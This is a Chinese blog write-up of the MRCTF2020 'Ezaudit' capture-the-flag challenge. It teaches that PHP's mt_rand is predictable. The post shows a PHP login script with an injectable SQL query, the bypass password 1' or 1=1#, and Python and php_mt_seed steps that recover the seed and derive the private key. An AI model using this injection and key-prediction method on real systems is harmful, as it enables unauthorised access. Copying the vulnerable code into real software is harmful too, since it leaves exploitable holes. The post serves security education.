[MRCTF2020]Ezaudit(随机数的安全)

于 2023-01-19 21:41:09 发布
阅读量630 收藏 3
点赞数 3
分类专栏: # web安全 文章标签: php web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63701832/article/details/128734509
版权

目录

信息收集

代码审计

相关函数

前提知识

思路分析

补充知识

信息收集

查看源代码没有发现有用信息,尝试dirmap扫下目录

python3 dirmap.py -i 网址 -lcf

扫描时发现一个www.zip目录

下载到一份index.php文件,找到一个login.html

<?php 
header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if(isset($_POST['login'])){
    $username = $_POST['username'];
    $pass = $_POST['pass'];
    $Private_key = $_POST['Private_key'];
    if (($username == '') || ($pass == '') ||($Private_key == '')) {
        // 若为空,视为未填写,提示错误,并3秒后返回登录界面
        header('refresh:2; url=login.html');
        echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!";
        exit;
}
    else if($Private_key != '*************' )
    {
        header('refresh:2; url=login.html');
        echo "假密钥,咋会让你登录?crispr会让你在2秒后跳转到登录界面的!";
        exit;
    }

    else{
        if($Private_key === '************'){
        $getuser = "SELECT flag FROM user WHERE username= 'crispr' AND pass = '$pass'".';'; 
        $link=mysql_connect("localhost","root","root");
        mysql_select_db("test",$link);
        $result = mysql_query($getuser);
        while($row=mysql_fetch_assoc($result)){
            echo "<tr><td>".$row["username"]."</td><td>".$row["flag"]."</td><td>";
        }
    }
    }

} 
// genarate public_key 
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
  }

  //genarate private_key
  function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
  }
  $Public_key = public_key();
  //$Public_key = KVQP0LdJKRaV3n9D  how to get crispr's private_key???

代码审计

审计代码得知有login.html,想要登陆的话需要用户名、密码、密钥,并且用户名必须为crisper,密码使用1' or 1=1#,此时只需要知道秘钥即可

相关函数

substr(string,start,length)

string必需。规定要返回其中一部分的字符串。
start必需。规定在字符串的何处开始。
  • 正数 - 在字符串的指定位置开始
  • 负数 - 在从字符串结尾的指定位置开始
  • 0 - 在字符串中的第一个字符处开始
length可选。规定要返回的字符串长度。默认是直到字符串的结尾。
  • 正数 - 从 start 参数所在的位置返回
  • 负数 - 从字符串末端返回

mt_rand()

函数使用 Mersenne Twister 算法生成随机整数
mt_rand(min,max);

参数描述
min可选。规定返回的最小数。默认是 0。
max可选。规定返回的最大数。默认是mt_getrandmax() 2147483647

前提知识

mt_srand

mt_srand([ int $seed] ) : void

用 seed 来给随机数发生器播种。 没有设定 seed 参数时,会被设为随时数。使用者在进行一次mt_srand()操作后,seed数值将被固定下来,给接下来的mt_rand()函数使用。

mt_rand()存在的问题

由于mt_rand()的生成的随机数只跟seed和调用该函数的次数有关。举一个简单的例子来说明一下这个问题,假设使用mt_srand(1111111)进行了一次播种操作,接下来调用mt_rand()函数,第一次生成的数值为a,第二次生成的为b,第三次生成的为c。任何一个人拿到这样的一串代码,所执行的结果都是跟刚刚描述的一样。所以当你的seed数值被他人知道后,就可以预测出你接下来的数值是多少,这就是该函数的一个问题,他并不能起到一个真随机数的作用。

简单举个例子

<?php  
mt_srand(1234);    
echo mt_rand()."</br>";
echo mt_rand()."</br>";
echo mt_rand()."</br>";
?>

411284887
1068724585
1335968403

由1234产生的数值前三个固定为上面的值,当对手知道你的第一次为411284887时便能猜测你的seed和下一次生成的数值,因为同一个种子产生的随机数只会根据调用次数的不同产生不同的数。

思路分析

使用python脚本先将公钥转换成脚本能识别的数列

str1 ='KVQP0LdJKRaV3n9D'
str2 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
res =''
length = str(len(str2)-1)
for i in range(len(str1)):
    for j in range(len(str2)):
        if str1[i] ==  str2[j]:
            res += str(j) + ' ' +str(j) + ' ' + '0' + ' ' + length + ' '
            break
print(res)

36 36 0 61 47 47 0 61 42 42 0 61 41 41 0 61 52 52 0 61 37 37 0 61 3 3 0 61 35 35 0 61 36 36 0 61 43 43 0 61 0 0 0 61 47 47 0 61 55 55 0 61 13 13 0 61 61 61 0 61 29 29 0 61

36 36 0 61 47 47 0 61 42 42 0 61 41 41 0 61 52 52 0 61 37 37 0 61 3 3 0 61 35 35 0 61 36 36 0 61 43 43 0 61 0 0 0 61 47 47 0 61 55 55 0 61 13 13 0 61 61 61 0 61 29 29 0 61

kali开一个php_mt_seed来跑种子

tar zxvf php_mt_seed-4.0.tar.gz

make

chmod 777 php_mt_seed-4.0/

time ./php_mt_seed 36 36 0 61 47 47 0 61 42 42 0 61 41 41 0 61 52 52 0 61 37 37 0 61 3 3 0 61 35 35 0 61 36 36 0 61 43 43 0 61 0 0 0 61 47 47 0 61 55 55 0 61 13 13 0 61 61 61 0 61 29 29 0 61

 

种子为1775196155,PHP版本为(5.2.1-7.0.x)

<?php
mt_srand(1775196155);
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
  }
 
function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
  }
echo public_key() . "<br>";
echo private_key();
?>

这里我们PHP版本是5.3.29

KVQP0LdJKRaV3n9D
XuNhoueCDCGc

因此私钥为

XuNhoueCDCGc

拿到flag

补充知识

kali的apt命令

apt-get	        	    功能
apt-get	        	    安装软件包
apt-get remove		    删除软件包
apt-get remove		    更换所有包
apt-get purge		    移除软件包及配置文件
apt-get upgrade        	更新所有软件包(自动处理依赖项)
apt-get autoremove		自动删除不需要的包
apt-get dist-upgrade	在升级软件包时自动处理依赖关系
apt-cache search		搜索应用程序
apt-cache	            显示安装细节

1.安装软件
apt-get install {包名}

2.更新软件
apt-get install update

3.软件包升级

apt-get upgrade

4.系统版本升级

apt-get dist -upgrade 注意:要先进行软件包升级才可以进行系统版本升级

5.移除软件

apt-get remove {包名}

6.自动移除系统不需要的旧的软件包

apt-get autoremove

7.完全移除,除了移除所需文件之外还移除配置文件以及历史文件

apt-get purge {包名}

8.清理已经安装过的软件包

apt-get clean
coleak
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
随机数发生器在信息安全系统中的应用
08-01
随机数发生器在信息安全系统中的应用 随机数序列是信息安全系统的基石,整个系统的安全性完全依赖于随机数序列的生成效率和质量。真随机数发生器在信息安全系统中的应用非常重要,高质量的随机数在信息安全系统中...
GMT 0078-2020 密码随机数生成模块设计指南.pdf
最新发布
07-31
GMT 0078-2020 密码随机数生成模块设计指南
[MRCTF2020]Ezaudit
m0_63045593的博客
04-20 1238
[MRCTF2020]Ezaudit dirsearch扫目录www.zip有源码 else if($Private_key != '*****' ) { header('refresh:2; url=login.html'); echo "假密钥,咋会让你登录?crispr会让你在2秒后跳转到登录界面的!"; exit; } else{ if($Private_key === '************'){ $getuser = "SELECT flag FROM use...
Java中的随机数详解
09-04
Java中的随机数详解 Java中的随机数详解主要介绍了Java中的随机数种类、生成方式、使用方法和注意事项等知识点。 随机数种类: 在Java中,随机数可以分为两类:真随机数和伪随机数。真随机数是通过某种物理现象或...
国密随机数检测工具,随机数检测
09-09
国密随机数检测工具,随机数检测
BUUCTF-[MRCTF2020]Ezaudit
qq_24033605的博客
11-04 3255
[MRCTF2020]Ezaudit 扫描目录,发现www.zip可以下载到源码。 进行部分审计, 只有当username,password和private_key全部正确时,才会获取flag。 对于username和password,由于是sql查询,可以万能密码进行绕过,剩下的问题是获取private_key。 给出了获取public_key和private_key的函数,并且mt_rand函数是伪随机函数,只要获取种子值就都不是问题。 接下来我们要根据public_key反推出种子值。 首先转换字
[MRCTF2020]Ezaudit WP
車鈊的博客
10-23 489
进入网站 获得源码 看到熟悉的网页模板想到了敏感文档泄露和用户信息查询 点击全部链接,尝试输入邮箱发现不是。 完事以后测试其他文件泄露,尝试进行目录遍历,跑脚本 python dirsearch.py -u http://77936295-dc14-466d-9fe7-6cdc5a55a916.node3.buuoj.cn/ -e * --threads=1 发现无论多小的线程速度都会产生429状态码 原来是服务器限制了访问的频率,猜测和BUUCTF服务器有关系。 只能进行手工检测 发现在www.z
[MRCTF2020]Ezaudit php_mt_seed 伪随机
scrawman的博客
11-30 393
[MRCTF2020]Ezaudit dirsearch扫出来三个文件,访问login.html,,要求我们输入用户名,密码和私钥。用户名从index.php里看出来是crispr,密码用万能密码,主要是这个私钥。 <?php header('Content-type:text/html; charset=utf-8'); error_reporting(0); if(isset($_POST['login'])){ $username = $_POST['username'];
buuctf [MRCTF2020]Ezaudit随机数
为之的博客
07-21 1227
打开网页,看不出什么,直接打开dirmap扫描 扫出了www.zip 下载后有index.php文件 查看源码后大概意思就是 去login.html页面登录,输入账号密码以及私钥,后2个输对了就能得到flag 密码可以直接用万能钥匙 1' or '1'='1 来绕过,主要就是私钥了 这里涉及到mt_srand()函数,伪随机数,即这随机数是我们可以预测的,只要找到该函数在这的种子值就可以预测, 因为公钥私钥都是使用一个种子值来推...
审计练习17——[MRCTF2020]Ezpop
qq_43756333的博客
06-17 552
平台:buuoj.cn 打开靶机得源码 <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { protected $var; public f
BUUCTF解题十一道(04)
qq_45837896的博客
06-14 1411
文章目录[GWCTF 2019]我有一个数据库[BJDCTF2020]ZJCTF,不过如此[BJDCTF2020]The mystery of ip[BJDCTF2020]Mark loves cat[安洵杯 2019]easy_web[网鼎杯 2020 朱雀组]phpweb[ASIS 2019]Unicorn shop[BJDCTF2020]Cookie is so stable[BSidesCF 2020]Had a bad day[CISCN 2019 初赛]Love Math [GWCTF 2019
rust生成安全随机数
07-24
在 Rust 中生成安全随机数可以使用 `rand` 库。`rand` 库提供了多种生成随机数的方法,包括生成安全随机数的接口。 首先,您需要在 `Cargo.toml` 文件中将 `rand` 添加为依赖项: ```toml [dependencies] rand = ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

coleak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值